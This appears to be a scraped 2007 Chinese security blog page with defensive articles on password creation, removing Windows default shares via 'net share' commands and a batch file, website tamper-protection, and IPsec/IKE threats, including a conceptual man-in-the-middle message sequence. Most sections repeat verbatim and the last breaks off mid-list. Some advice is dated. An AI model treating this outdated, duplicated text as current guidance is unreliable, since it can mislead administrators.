创建容易记忆而又安全的密码
[ 2007-03-25 03:51:48 | 作者: sun ]
用户们经常会忘记自己的密码。为了不忘记密码,他们就是用些简单的信息来创建密码,比如用养的狗的名字,儿子的名字和生日,目前月份的名称——或者任何可以帮助他们记住密码的东西。
对于那些侵入你的计算机系统的黑客来说,你创建的这些密码毫无作用,就好比把门锁上了却把钥匙扔在门外的擦鞋垫上一样。黑客不需要使用特殊工具就能发现你个人的基本信息——名字,孩子的名字,生日,宠物名字,等等。他可以把这些作为破解你密码的线索一一尝试。
想要创建安全又好记的密码,请遵循如下几个简单的要求:
1、别用个人信息
永远不要用个人信息来创建密码。别人很容易猜到你可能用姓,宠物名字,孩子的出生日期或者其他类似的细节。
2、别用真实的单词
黑客们能用某些工具猜出你的密码。现如今的计算机不需要花很久的时间就可以把字典中的所有单词都试一遍,然后找出你的密码。所以你最好别用真实的单词做密码。
3、混用不同体的字符
混用不同的字体的字符可以使你的密码更安全。既用大写字母也用小写字母,以及数字,甚至诸如‘&’和‘%’等。
4、使用惯用语
除了记住那些用各种字符组成的密码,你还可以使用惯用语,它同样可以组成不是字典中的单词的密码。你可以想出一句话或者一行你喜欢的歌曲或诗歌,用它每个单词的首字母创建一个密码。
例如,与其创建一个'yrHes'这样的密码,你不如用“I like to read the About.com Internet / Network Security web site”这句话,把它转成如“il2rtA!nsws”这样的密码。这个密码中,用‘2’取代‘to’,并且用惊叹号代替‘Internet’的首字母‘i’。你也可以用各种各样的字符来创建难以被破解的密码,并且便于自己记忆。
5、使用密码管理工具
安全地储存和记忆密码的另一个办法就是使用密码管理工具。这类工具把用户名密码加密后保存。有些甚至可以在你访问网站时自动向站点或者应用程序填写用户名和密码信息。
6、使用不同的密码
如果想要保护你的账户和程序,你应该为每个应用程序使用不同的用户名和密码。即使其中的某一个密码被破解了,你其他的密码还是安全的。另一个方法比这种方法的安全性略低,但是它可以使你在安全与方便之间取个折衷。这种方法就是对那些不需要额外保障其安全性的应用都是用一套用户名和密码,而在你的银行或者信用卡的网站则用单独的用户名和更安全的密码。
7、经常更换密码
你应该至少每30到60天就应该更换密码。并且至少一年之内不应当重复使用同一个密码。
8、加强密码的安全性
与其依靠计算机的每一位使用者去理解并遵循以上的建议,你还不如给操作系统配置密码策略,这样系统将不接受那些不符合最低安全要求的密码
对于那些侵入你的计算机系统的黑客来说,你创建的这些密码毫无作用,就好比把门锁上了却把钥匙扔在门外的擦鞋垫上一样。黑客不需要使用特殊工具就能发现你个人的基本信息——名字,孩子的名字,生日,宠物名字,等等。他可以把这些作为破解你密码的线索一一尝试。
想要创建安全又好记的密码,请遵循如下几个简单的要求:
1、别用个人信息
永远不要用个人信息来创建密码。别人很容易猜到你可能用姓,宠物名字,孩子的出生日期或者其他类似的细节。
2、别用真实的单词
黑客们能用某些工具猜出你的密码。现如今的计算机不需要花很久的时间就可以把字典中的所有单词都试一遍,然后找出你的密码。所以你最好别用真实的单词做密码。
3、混用不同体的字符
混用不同的字体的字符可以使你的密码更安全。既用大写字母也用小写字母,以及数字,甚至诸如‘&’和‘%’等。
4、使用惯用语
除了记住那些用各种字符组成的密码,你还可以使用惯用语,它同样可以组成不是字典中的单词的密码。你可以想出一句话或者一行你喜欢的歌曲或诗歌,用它每个单词的首字母创建一个密码。
例如,与其创建一个'yrHes'这样的密码,你不如用“I like to read the About.com Internet / Network Security web site”这句话,把它转成如“il2rtA!nsws”这样的密码。这个密码中,用‘2’取代‘to’,并且用惊叹号代替‘Internet’的首字母‘i’。你也可以用各种各样的字符来创建难以被破解的密码,并且便于自己记忆。
5、使用密码管理工具
安全地储存和记忆密码的另一个办法就是使用密码管理工具。这类工具把用户名密码加密后保存。有些甚至可以在你访问网站时自动向站点或者应用程序填写用户名和密码信息。
6、使用不同的密码
如果想要保护你的账户和程序,你应该为每个应用程序使用不同的用户名和密码。即使其中的某一个密码被破解了,你其他的密码还是安全的。另一个方法比这种方法的安全性略低,但是它可以使你在安全与方便之间取个折衷。这种方法就是对那些不需要额外保障其安全性的应用都是用一套用户名和密码,而在你的银行或者信用卡的网站则用单独的用户名和更安全的密码。
7、经常更换密码
你应该至少每30到60天就应该更换密码。并且至少一年之内不应当重复使用同一个密码。
8、加强密码的安全性
与其依靠计算机的每一位使用者去理解并遵循以上的建议,你还不如给操作系统配置密码策略,这样系统将不接受那些不符合最低安全要求的密码
Windows服务器:切断默认共享通道七招
[ 2007-03-25 03:51:37 | 作者: sun ]
在Windows服务器系统中,每当服务器启动成功时,系统的C盘、D盘等都会被自动设置成隐藏共享,尽管通过这些默认共享可以让服务器管理维护起来更方便一些;但在享受方便的同时,这些默认共享常常会被一些非法攻击者利用,从而容易给服务器造成安全威胁。如果你不想让服务器轻易遭受到非法攻击的话,就必须及时切断服务器的默认共享“通道”。下面,本文就为大家推荐以下几则妙招,以便让你轻松禁止掉服务器的默认共享。
功能配置法
这种方法是通过Windows XP或Windows 2003系统中的msconfig命令,来实现切断服务器默认共享“通道”目的的。使用该方法时,可以按照如下步骤来进行:
依次单击“开始”/“运行”命令,在随后出现的系统运行设置框中,输入字符串命令“msconfig”,单击“确定”按钮后,打开一个标题为系统配置实用程序的设置窗口;
单击该窗口中的“服务”选项卡,在其后打开的如图1所示的选项设置页面中,找到其中的“Server”项目,并检查该项目前面是否有勾号存在,要是有的话必须将其取消掉,最后单击一下“确定”按钮,以后重新启动服务器系统时,服务器的C盘、D盘等就不会被自动设置成默认共享了。
小提示:尽管Windows 2000服务器系统没有系统配置实用程序功能,但考虑到该系统的内核与Windows 2003系统内核比较接近,因此你可以将Windows 2003系统中的msconfig.exe文件和msconfig.chm文件直接复制到Windows 2000系统目录中,以后你也可以在该系统的运行对话框中,直接启动系统配置实用程序功能了。如果在启动该功能的过程中,遇到有错误提示窗口弹出时,你可以不必理会,不停单击“取消”按钮就可以看到系统配置实用程序设置窗口了。
“强行”停止法
所谓“强行”停止法,其实就是借助Windows服务器的计算机管理功能,来对已经存在的默认共享文件夹,“强制”停止共享命令,以便让其共享状态取消,同时确保这些文件夹下次不能被自动设置成共享。在“强行”停止默认共享文件夹的共享状态时,你可以按照下面的步骤来进行:
依次单击“开始”/“运行”命令,在打开的系统运行设置框中,输入字符串命令“compmgmt.msc”,单击“确定”按钮后,打开打开Windows服务器系统的“计算机管理”界面;
在该界面的左侧列表区域中,用鼠标逐一展开“系统工具”、“共享文件夹”、“共享”文件夹,在对应“共享”文件夹右边的子窗口中,你将会发现服务器系统中所有已被共享的文件文件夹都被自动显示出来了,其中共享名称后面带有“$”符号的共享文件夹,就是服务器自动生成的默认共享文件夹;
要取消这些共享文件夹的共享状态,你只要先用鼠标逐一选中它们,然后再用右键单击之,在其后打开的快捷菜单中,选中“停止共享”选项,随后屏幕上将打开一个如图2所示的对话框,要求你确认一下是否真的想停止已经选择的共享,此时你再单击一下“是”按钮,所有选中的默认共享文件夹的共享标志就会自动消失了,这表明它们的共享状态已经被“强行”停止了,以后哪怕是重新启动服务器系统,服务器的C盘、D盘也不会被自动设置成默认共享了。
逐一删除法
所谓“逐一删除法”,其实就是借助Windows服务器内置的“net share”命令,来将已经处于共享状态的默认共享文件夹,一个一个地删除掉(当然这里的删除,仅仅表示删除默认共享文件夹的共享状态,而不是删除默认文件夹中的内容),但该方法有一个致命的缺陷,就是无法实现“一劳永逸”的删除效果,只要服务器系统重新启动一下,默认共享文件夹又会自动生成了。在使用该方法删除默认共享文件夹的共享状态时,可以参考如下的操作步骤:
首先在系统的开始菜单中,执行“运行”命令,打开系统运行设置框,在该对话框中输入字符串命令“cmd”后,再单击“确定”按钮,这样Windows服务器系统就会自动切换到DOS命令行工作状态;
然后在DOS命令行中,输入字符串命令“net share c$ /del”,单击回车键后,服务器中C盘分区的共享状态就被自动删除了;如果服务器中还存在D盘分区、E盘分区的话,你可以按照相同的办法,分别执行字符串命令“net share d$ /del”、“net share e$ /del”来删除它们的共享状态;
此外,对应IP$、Admin$之类的默认共享文件夹,你们也可以执行字符串命令“net share ipc$ /del”、“net share admin$ /del”,来将它们的隐藏共享状态取消,这样的话非法攻击者就无法通过这些隐藏共享“通道”,来随意攻击Windows服务器了。
“自动”删除法
如果服务器中包含的隐藏共享文件夹比较多的话,依次通过“net share”命令来逐一删除它们时,将显得非常麻烦。其实,我们可以自行创建一个批处理文件,来让服务器一次性删除所有默认共享文件夹的共享状态。在创建批处理文件时,只要打开类似记事本之类的文本编辑工具,并在编辑窗口中输入下面的源代码命令:
@echo off
net share C$ /del
net share D$ /del
net share ipc$ /del
net share admin$ /del
……
完成上面的代码输入操作后,再依次单击文本编辑窗口中的“文件”/“保存”菜单命令,在弹出的文件保存对话框中输入文件名为“delshare.bat”,并设置好具体的保存路径,再单击一下“保存”按钮,就能完成自动删除默认共享文件夹的批处理文件创建工作了。以后需要删除这些默认共享文件夹的共享状态时,只要双击“delshare.bat”批处理文件,服务器系统中的所有默认共享“通道”就能被自动切断了。
功能配置法
这种方法是通过Windows XP或Windows 2003系统中的msconfig命令,来实现切断服务器默认共享“通道”目的的。使用该方法时,可以按照如下步骤来进行:
依次单击“开始”/“运行”命令,在随后出现的系统运行设置框中,输入字符串命令“msconfig”,单击“确定”按钮后,打开一个标题为系统配置实用程序的设置窗口;
单击该窗口中的“服务”选项卡,在其后打开的如图1所示的选项设置页面中,找到其中的“Server”项目,并检查该项目前面是否有勾号存在,要是有的话必须将其取消掉,最后单击一下“确定”按钮,以后重新启动服务器系统时,服务器的C盘、D盘等就不会被自动设置成默认共享了。
小提示:尽管Windows 2000服务器系统没有系统配置实用程序功能,但考虑到该系统的内核与Windows 2003系统内核比较接近,因此你可以将Windows 2003系统中的msconfig.exe文件和msconfig.chm文件直接复制到Windows 2000系统目录中,以后你也可以在该系统的运行对话框中,直接启动系统配置实用程序功能了。如果在启动该功能的过程中,遇到有错误提示窗口弹出时,你可以不必理会,不停单击“取消”按钮就可以看到系统配置实用程序设置窗口了。
“强行”停止法
所谓“强行”停止法,其实就是借助Windows服务器的计算机管理功能,来对已经存在的默认共享文件夹,“强制”停止共享命令,以便让其共享状态取消,同时确保这些文件夹下次不能被自动设置成共享。在“强行”停止默认共享文件夹的共享状态时,你可以按照下面的步骤来进行:
依次单击“开始”/“运行”命令,在打开的系统运行设置框中,输入字符串命令“compmgmt.msc”,单击“确定”按钮后,打开打开Windows服务器系统的“计算机管理”界面;
在该界面的左侧列表区域中,用鼠标逐一展开“系统工具”、“共享文件夹”、“共享”文件夹,在对应“共享”文件夹右边的子窗口中,你将会发现服务器系统中所有已被共享的文件文件夹都被自动显示出来了,其中共享名称后面带有“$”符号的共享文件夹,就是服务器自动生成的默认共享文件夹;
要取消这些共享文件夹的共享状态,你只要先用鼠标逐一选中它们,然后再用右键单击之,在其后打开的快捷菜单中,选中“停止共享”选项,随后屏幕上将打开一个如图2所示的对话框,要求你确认一下是否真的想停止已经选择的共享,此时你再单击一下“是”按钮,所有选中的默认共享文件夹的共享标志就会自动消失了,这表明它们的共享状态已经被“强行”停止了,以后哪怕是重新启动服务器系统,服务器的C盘、D盘也不会被自动设置成默认共享了。
逐一删除法
所谓“逐一删除法”,其实就是借助Windows服务器内置的“net share”命令,来将已经处于共享状态的默认共享文件夹,一个一个地删除掉(当然这里的删除,仅仅表示删除默认共享文件夹的共享状态,而不是删除默认文件夹中的内容),但该方法有一个致命的缺陷,就是无法实现“一劳永逸”的删除效果,只要服务器系统重新启动一下,默认共享文件夹又会自动生成了。在使用该方法删除默认共享文件夹的共享状态时,可以参考如下的操作步骤:
首先在系统的开始菜单中,执行“运行”命令,打开系统运行设置框,在该对话框中输入字符串命令“cmd”后,再单击“确定”按钮,这样Windows服务器系统就会自动切换到DOS命令行工作状态;
然后在DOS命令行中,输入字符串命令“net share c$ /del”,单击回车键后,服务器中C盘分区的共享状态就被自动删除了;如果服务器中还存在D盘分区、E盘分区的话,你可以按照相同的办法,分别执行字符串命令“net share d$ /del”、“net share e$ /del”来删除它们的共享状态;
此外,对应IP$、Admin$之类的默认共享文件夹,你们也可以执行字符串命令“net share ipc$ /del”、“net share admin$ /del”,来将它们的隐藏共享状态取消,这样的话非法攻击者就无法通过这些隐藏共享“通道”,来随意攻击Windows服务器了。
“自动”删除法
如果服务器中包含的隐藏共享文件夹比较多的话,依次通过“net share”命令来逐一删除它们时,将显得非常麻烦。其实,我们可以自行创建一个批处理文件,来让服务器一次性删除所有默认共享文件夹的共享状态。在创建批处理文件时,只要打开类似记事本之类的文本编辑工具,并在编辑窗口中输入下面的源代码命令:
@echo off
net share C$ /del
net share D$ /del
net share ipc$ /del
net share admin$ /del
……
完成上面的代码输入操作后,再依次单击文本编辑窗口中的“文件”/“保存”菜单命令,在弹出的文件保存对话框中输入文件名为“delshare.bat”,并设置好具体的保存路径,再单击一下“保存”按钮,就能完成自动删除默认共享文件夹的批处理文件创建工作了。以后需要删除这些默认共享文件夹的共享状态时,只要双击“delshare.bat”批处理文件,服务器系统中的所有默认共享“通道”就能被自动切断了。
安全方案 多角度详解网站安全保护方法
[ 2007-03-25 03:51:25 | 作者: sun ]
一、网站的通用保护方法
针对黑客威胁,网络安全管理员采取各种手段增强服务器的安全,确保WWW服务的正常运行。象在Internet上的Email、ftp等服务器一样,可以用如下的方法来对WWW服务器进行保护:
安全配置
关闭不必要的服务,最好是只提供WWW服务,安装操作系统的最新补丁,将WWW服务升级到最新版本并安装所有补丁,对根据WWW服务提供者的安全建议进行配置等,这些措施将极大提供WWW服务器本身的安全。
防火墙
安装必要的防火墙,阻止各种扫描工具的试探和信息收集,甚至可以根据一些安全报告来阻止来自某些特定IP地址范围的机器连接,给WWW服务器增加一个防护层,同时需要对防火墙内的网络环境进行调整,消除内部网络的安全隐患。
漏洞扫描
使用商用或免费的漏洞扫描和风险评估工具定期对服务器进行扫描,来发现潜在的安全问题,并确保由于升级或修改配置等正常的维护工作不会带来安全问题。
入侵检测系统
利用入侵检测系统(IDS)的实时监控能力,发现正在进行的攻击行为及攻击前的试探行为,记录黑客的来源及攻击步骤和方法。
这些安全措施都将极大提供WWW服务器的安全,减少被攻击的可能性。
二、网站的专用保护方法
尽管采用的各种安全措施能防止很多黑客的攻击,然而由于各种操作系统和服务器软件漏洞的不断发现,攻击方法层出不穷,技术高明的黑客还是能突破层层保护,获得系统的控制权限,从而达到破坏主页的目的。这种情况下,一些网络安全公司推出了专门针对网站的保护软件,只保护网站最重要的内容--网页。一旦检测到被保护的文件发生了{非正常的}改变,就进行恢复。一般情况下,系统首先需要对正常的页面文件进行备份,然后启动检测机制,检查文件是否被修改,如果被修改就需要进行恢复。我们对以下几个方面的技术进行分析比较:
监测方式
本地和远程:检测可以是在本地运行一个监测端,也可以在网络上的另一台主机。如果是本地的话,监测端进程需要足够的权限读取被保护目录或文件。监测端如果在远端的话,WWW服务器需要开放一些服务并给监测端相应的权限,较常见的方式是直接利用服务器的开放的WWW服务,使用HTTP协议来监测被保护的文件和目录。也可利用其它常用协议来检测保护文件和目录,如FTP等。采用本地方式检测的优点是效率高,而远程方式则具有平台无关性,但会增加网络流量等负担。
定时和触发:绝大部分保护软件是使用的定时检测的方式,不论在本地还是远程检测都是根据系统设定的时间定时检测,还可将被保护的网页分为不同等级,等级高的检测时间间隔可以设得较短,以获得较好的实时性,而将保护等级较低的网页文件检测时间间隔设得较长,以减轻系统的负担。触发方式则是利用操作系统提供的一些功能,在文件被创建、修改或删除时得到通知,这种方法的优点是效率高,但无法实现远程检测。
比较方法
在判断文件是否被修改时,往往采用被保护目录和备份库中的文件进行比较,比较最常见的方式全文比较。使用全文比较能直接、准确地判断出该文件是否被修改。然而全文比较在文件较大较多时效率十分低下,一些保护软件就采用文件的属性如文件大小、创建修改时间等进行比较,这种方法虽然简单高效,但也有严重的缺陷:{恶意入侵者}可以通过精心构造,把替换文件的属性设置得和原文件完全相同,{从而使被恶意更改的文件无法被检测出来}。另一种方案就是比较文件的数字签名,最常见的是MD5签名算法,由于数字签名的不可伪造性,数字签名能确保文件的相同。
恢复方式
恢复方式与备份库存放的位置直接相关。如果备份库存放在本地的话,恢复进程必须有写被保护目录或文件的权限。如果在远程则需要通过文件共享或FTP的方式来进行,那么需要文件共享或FTP的帐号,并且该帐号拥有对被保护目录或文件的写权限。
备份库的安全
当黑客发现其更换的主页很快被恢复时,往往会激发起进一步破坏的欲望,此时备份库的安全尤为重要。网页文件的安全就转变为备份库的安全。对备份库的保护一种是通过文件隐藏来实现,让黑客无法找到备份目录。另一种方法是对备份库进行数字签名,如果黑客修改了备份库的内容,保护软件可以通过签名发现,就可停止WWW服务或使用一个默认的页面。
通过以上分析比较我们发现各种技术都有其优缺点,需要结合实际的网络环境来选择最适合的技术方案。
三、网站保护的缺陷
尽管网站保护软件能进一步提高系统的安全,仍然存在一些缺陷。首先这些保护软件都是针对静态页面而设计,而现在动态页面占据的范围越来越大,尽管本地监测方式可以检测脚本文件,但对脚本文件使用的数据库却无能为力。
另外,有些攻击并不是针对页面文件进行的,前不久泛滥成灾的"Red Code"就是使用修改IIS服务的一个动态库来达到攻击页面的目的。另一个方面,网站保护软件本身会增加WWW服务器的负载,在WWW服务器负载本身已经很重的情况下,一定好仔细规划好使用方案。
四、结论
本文讨论了网站常用的保护方法,详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点,并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的,但使用这些工具能帮助提高安全性,减少安全风险。
针对黑客威胁,网络安全管理员采取各种手段增强服务器的安全,确保WWW服务的正常运行。象在Internet上的Email、ftp等服务器一样,可以用如下的方法来对WWW服务器进行保护:
安全配置
关闭不必要的服务,最好是只提供WWW服务,安装操作系统的最新补丁,将WWW服务升级到最新版本并安装所有补丁,对根据WWW服务提供者的安全建议进行配置等,这些措施将极大提供WWW服务器本身的安全。
防火墙
安装必要的防火墙,阻止各种扫描工具的试探和信息收集,甚至可以根据一些安全报告来阻止来自某些特定IP地址范围的机器连接,给WWW服务器增加一个防护层,同时需要对防火墙内的网络环境进行调整,消除内部网络的安全隐患。
漏洞扫描
使用商用或免费的漏洞扫描和风险评估工具定期对服务器进行扫描,来发现潜在的安全问题,并确保由于升级或修改配置等正常的维护工作不会带来安全问题。
入侵检测系统
利用入侵检测系统(IDS)的实时监控能力,发现正在进行的攻击行为及攻击前的试探行为,记录黑客的来源及攻击步骤和方法。
这些安全措施都将极大提供WWW服务器的安全,减少被攻击的可能性。
二、网站的专用保护方法
尽管采用的各种安全措施能防止很多黑客的攻击,然而由于各种操作系统和服务器软件漏洞的不断发现,攻击方法层出不穷,技术高明的黑客还是能突破层层保护,获得系统的控制权限,从而达到破坏主页的目的。这种情况下,一些网络安全公司推出了专门针对网站的保护软件,只保护网站最重要的内容--网页。一旦检测到被保护的文件发生了{非正常的}改变,就进行恢复。一般情况下,系统首先需要对正常的页面文件进行备份,然后启动检测机制,检查文件是否被修改,如果被修改就需要进行恢复。我们对以下几个方面的技术进行分析比较:
监测方式
本地和远程:检测可以是在本地运行一个监测端,也可以在网络上的另一台主机。如果是本地的话,监测端进程需要足够的权限读取被保护目录或文件。监测端如果在远端的话,WWW服务器需要开放一些服务并给监测端相应的权限,较常见的方式是直接利用服务器的开放的WWW服务,使用HTTP协议来监测被保护的文件和目录。也可利用其它常用协议来检测保护文件和目录,如FTP等。采用本地方式检测的优点是效率高,而远程方式则具有平台无关性,但会增加网络流量等负担。
定时和触发:绝大部分保护软件是使用的定时检测的方式,不论在本地还是远程检测都是根据系统设定的时间定时检测,还可将被保护的网页分为不同等级,等级高的检测时间间隔可以设得较短,以获得较好的实时性,而将保护等级较低的网页文件检测时间间隔设得较长,以减轻系统的负担。触发方式则是利用操作系统提供的一些功能,在文件被创建、修改或删除时得到通知,这种方法的优点是效率高,但无法实现远程检测。
比较方法
在判断文件是否被修改时,往往采用被保护目录和备份库中的文件进行比较,比较最常见的方式全文比较。使用全文比较能直接、准确地判断出该文件是否被修改。然而全文比较在文件较大较多时效率十分低下,一些保护软件就采用文件的属性如文件大小、创建修改时间等进行比较,这种方法虽然简单高效,但也有严重的缺陷:{恶意入侵者}可以通过精心构造,把替换文件的属性设置得和原文件完全相同,{从而使被恶意更改的文件无法被检测出来}。另一种方案就是比较文件的数字签名,最常见的是MD5签名算法,由于数字签名的不可伪造性,数字签名能确保文件的相同。
恢复方式
恢复方式与备份库存放的位置直接相关。如果备份库存放在本地的话,恢复进程必须有写被保护目录或文件的权限。如果在远程则需要通过文件共享或FTP的方式来进行,那么需要文件共享或FTP的帐号,并且该帐号拥有对被保护目录或文件的写权限。
备份库的安全
当黑客发现其更换的主页很快被恢复时,往往会激发起进一步破坏的欲望,此时备份库的安全尤为重要。网页文件的安全就转变为备份库的安全。对备份库的保护一种是通过文件隐藏来实现,让黑客无法找到备份目录。另一种方法是对备份库进行数字签名,如果黑客修改了备份库的内容,保护软件可以通过签名发现,就可停止WWW服务或使用一个默认的页面。
通过以上分析比较我们发现各种技术都有其优缺点,需要结合实际的网络环境来选择最适合的技术方案。
三、网站保护的缺陷
尽管网站保护软件能进一步提高系统的安全,仍然存在一些缺陷。首先这些保护软件都是针对静态页面而设计,而现在动态页面占据的范围越来越大,尽管本地监测方式可以检测脚本文件,但对脚本文件使用的数据库却无能为力。
另外,有些攻击并不是针对页面文件进行的,前不久泛滥成灾的"Red Code"就是使用修改IIS服务的一个动态库来达到攻击页面的目的。另一个方面,网站保护软件本身会增加WWW服务器的负载,在WWW服务器负载本身已经很重的情况下,一定好仔细规划好使用方案。
四、结论
本文讨论了网站常用的保护方法,详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点,并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的,但使用这些工具能帮助提高安全性,减少安全风险。
网络层安全服务与攻击分析
[ 2007-03-25 03:51:11 | 作者: sun ]
在网络层实现安全服务有很多的优点。首先,由于多种传送协议和应用程序可以共享由网络层提供的密钥管理架构,密钥协商的开销被大大地削减了。其次,若安全服务在较低层实现,那么需要改动的程序就要少很多。但是在这样的情况下仍会有新的安全问题。本文将对此作出阐述。
目前公认的网络攻击三种原型是窃听 、篡改、伪造、拒绝服务攻击等。
IPSec 针对攻击原型的安全措施
IPsec提供三项主要的功能:认证功能(AH),认证和机密组合功能(ESP)及密钥交换功能。AH的目的是提供无连接完整性和真实性包括数据源认证和可选的抗重传服务;ESP分为两部分,其中ESP头提供数据机密性和有限抗流量分析服务,在ESP尾中可选地提供无连接完整性、数据源认证和抗重传服务。
IPSec提供了一种标准的、健壮的以及包容广泛的机制,可用它为IP及上层协议(如UDP和TCP)提供安全保证。它定义了一套默认的、强制实施的算法,以确保不同的实施方案相互间可以共通。而且很方便扩展。IPSec可保障主机之间、安全网关(如路由器或防火墙)之间或主机与安全网关之间的数据包的安全。IPSec是一个工业标准网络安全协议,为IP网络通信提供透明的安全服务,保护TCP/IP通信免遭窃听和篡改,可以有效抵御网络攻击,同时保持易用性。IPSec有两个基本目标:保护IP数据包安全;为抵御网络攻击提供防护措施。IPSec结合密码保护服务、安全协议组和动态密钥管理,三者共同实现上述两个目标,IPSec基于一种端对端的安全模式。这种模式有一个基本前提假设,就是假定数据通信的传输媒介是不安全的,因此通信数据必须经过加密,而掌握加解密方法的只有数据流的发送端和接收端,两者各自负责相应的数据加解密处理,而网络中其他只负责转发数据的路由器或主机无须支持IPSec。
IPSec提供三种不同的形式来保护通过公有或私有IP网络来传送的私有数据。
(1)验证:通过认证可以确定所接受的数据与所发送的数据是一致的,同时可以确定申请发送者在实际上是真实发送者,而不是伪装的。
(2)数据完整验证:通过验证保证数据从原发地到目的地的传送过程中没有任何不可检测的数据丢失与改变。
(3)保密:使相应的接收者能获取发送的真正内容,而无关的接收者无法获知数据的真正内容。
IPv6下对网络安全的威胁
针对密码攻击的分析
基于密码的攻击很具有生命力,在IPv6环境下同样面临着这样的威胁。虽然在网络IPv6下IPsec是强制实施的,但是在这种情况下,用户使用的操作系统与其他访问控制的共同之处就是基于密码进行访问控制。对计算机与网络资源的访问都是由用户名与密码决定的。对那些版本较老的操作系统,有些组件不是在通过网络传输标识信息进行验证时就对该信息加以保护,这样窃听者能够获取有效的用户名与密码,就拥有了与实际用户同样的权限。攻击者就可以进入到机器内部进行恶意破坏。
针对泄漏密钥攻击的分析
IPv6下IPsec工作的两种模式(传输模式和隧道模式)都需要密钥交换这样的过程,因此对密钥的攻击仍然具有威胁。尽管对于攻击者来说确定密钥是一件艰难而消耗资源的过程,但是这种可能性实实在在存在。当攻击者确定密钥之后,攻击者使用泄露密钥便可获取对于安全通信的访问权,而发送者或接收者却全然没有察觉攻击,后面所进行的数据传输等等遭到没有抵抗的攻击。进而,攻击者使用泄露密钥即可解密或修改其他需要的数据。同样攻击者还会试图使用泄露密钥计算其它密钥,从而使其获取对其它安全通信的访问权。
针对应用层服务攻击
应用程序层攻击的目标是应用程序服务器,即导致服务器的操作系统或应用程序出错。这会使攻击者有能力绕过正常访问控制。攻击者利用这一点便可控制应用程序、系统或网络,并可进行下列任意操作:读取、添加、删除或修改数据或操作系统 ;引入病毒,即使用计算机与软件应用程序将病毒复制到整个网络;引入窃探器来分析网络与获取信息,并最终使用这些信息导致网络停止响应或崩溃;异常关闭数据应用程序或操作系统;禁用其它安全控制以备日后攻击。
由于IPsec在网络层进行数据包加密,在网络传输过程中防火墙无法有效地将加密的带有病毒的数据包进行有效的监测,这样就对接收端的主机或路由器构成了威胁。
可能发生的拒绝服务攻击
密钥管理分为手工密钥管理和自动密钥管理。Internet密钥管理协议被定位在应用程序的层次,IETF规定了Internet安全协议和密钥管理协议ISAKMP(Internet Security Association and Key Management Protocol) 来实现IPSec的密钥管理需求, 为身份验证的SA 设置以及密钥交换技术定义了一个通用的结构, 可以使用不同的密钥交换技术;IETF还设计了OA KL EY密钥确定协议(Key Determination Protocol) 来实施ISAKMP的具体功能, 其主要目的是使需要保密通信的双方能够通过这个协议证明自己的身份、认证对方的身份、确定采用的加密算法和通信密钥, 从而建立起安全的通信连接。
对IPsec最主要的难应用性在于它们所强化的系统的复杂性和缺乏清晰性。IPsec中包含太多的选项和太多的灵活性。对于相同的或者类似的情况常常有多种做法。
IKE的协议容易受到拒绝服务攻击。攻击者可以在因特网初始化许多连接请求就可以做到,这时服务器将会维护这些恶意的“小甜饼”。
加密是有代价的。进行模数乘幂运算,或计算两个非常大的质数的乘积,甚至对单个数据包进行解密和完整性查验,都会占用cpu的时间。发起攻击的代价远远小于被攻击对象响应这种攻击所付出的代价。例如,甲想进行一次Diffie-Hellman密钥交换,但mallory向她发送了几千个虚假的Diffie-Hellman公共值,其中全部填充伪造的返回地址。这样乙被动地进入这种虚假的交换。显然会造成cpu的大量浪费。
IPsec对相应的攻击提出了相应的对策。但它并不是通过抵挡服务否认攻击来进行主动防御,只是增大了发送这种垃圾包的代价及复杂度,来进行一种被动防御。
但是攻击者仍然可以利用IKE协议的漏洞从而使服务中断。
以下是基于签名的IKE阶段1主模式的认证失败(如图4所示)。
(Malice 对I使用他的真实身份信息,而对R则冒充I)
1. I到Malice:HDRI,SAI;
1’Malice(“I”)到R:HDRI,SAI;
2’R到Malice(“I”):HDRR,SAR;
2.Malice到I:HDRR,SAR;
3.I到Malice:HDRI,gx,NI;
3’Malice(“I”)到R:HDRI,gx,NI;
4’R到Malice(“I”):HDRR,gy,NR;
4.Malice到I:HDRR,gy,NR;
5.I到Malice:HDRI,{IDI,CertI,SigI}gxy?;
5’Malice(“I”)到R:HDRI,{IDI,CertI,SigI}gxy;
6’R到Malice(“I”):HDRR,{IDR,CertR,SigR}gxy;
6. Dropped。
这样,R认为刚才和他对话并和他共享会话密钥的是I,而I却认为刚才是和Malice进行了一次不成功的通信。R根本不会被通知存在任何异常,并且也许会拒绝来自I的服务;实际上R进入了这样一种状态,只接受来自I的服务请求(也许直到“超时”后,R才会脱离这样的状态。)
面对越来越多的网络安全问题,唯有各种安全协议有效地结合起来使用才会降低攻击的可能性。由于IPsec是IPv6下强制使用的,加上网络层加密的特殊优点,把工作于IP层的IPsec和其他的安全协议(SSL等)结合起来可以将网络安全的质量提高到更高的一个水平。但是同时道高一尺,魔高一丈,新的安全问题会接踵而至,对于协议的漏洞,要先知先觉,这样才会未雨绸缪,防患于未然。
目前公认的网络攻击三种原型是窃听 、篡改、伪造、拒绝服务攻击等。
IPSec 针对攻击原型的安全措施
IPsec提供三项主要的功能:认证功能(AH),认证和机密组合功能(ESP)及密钥交换功能。AH的目的是提供无连接完整性和真实性包括数据源认证和可选的抗重传服务;ESP分为两部分,其中ESP头提供数据机密性和有限抗流量分析服务,在ESP尾中可选地提供无连接完整性、数据源认证和抗重传服务。
IPSec提供了一种标准的、健壮的以及包容广泛的机制,可用它为IP及上层协议(如UDP和TCP)提供安全保证。它定义了一套默认的、强制实施的算法,以确保不同的实施方案相互间可以共通。而且很方便扩展。IPSec可保障主机之间、安全网关(如路由器或防火墙)之间或主机与安全网关之间的数据包的安全。IPSec是一个工业标准网络安全协议,为IP网络通信提供透明的安全服务,保护TCP/IP通信免遭窃听和篡改,可以有效抵御网络攻击,同时保持易用性。IPSec有两个基本目标:保护IP数据包安全;为抵御网络攻击提供防护措施。IPSec结合密码保护服务、安全协议组和动态密钥管理,三者共同实现上述两个目标,IPSec基于一种端对端的安全模式。这种模式有一个基本前提假设,就是假定数据通信的传输媒介是不安全的,因此通信数据必须经过加密,而掌握加解密方法的只有数据流的发送端和接收端,两者各自负责相应的数据加解密处理,而网络中其他只负责转发数据的路由器或主机无须支持IPSec。
IPSec提供三种不同的形式来保护通过公有或私有IP网络来传送的私有数据。
(1)验证:通过认证可以确定所接受的数据与所发送的数据是一致的,同时可以确定申请发送者在实际上是真实发送者,而不是伪装的。
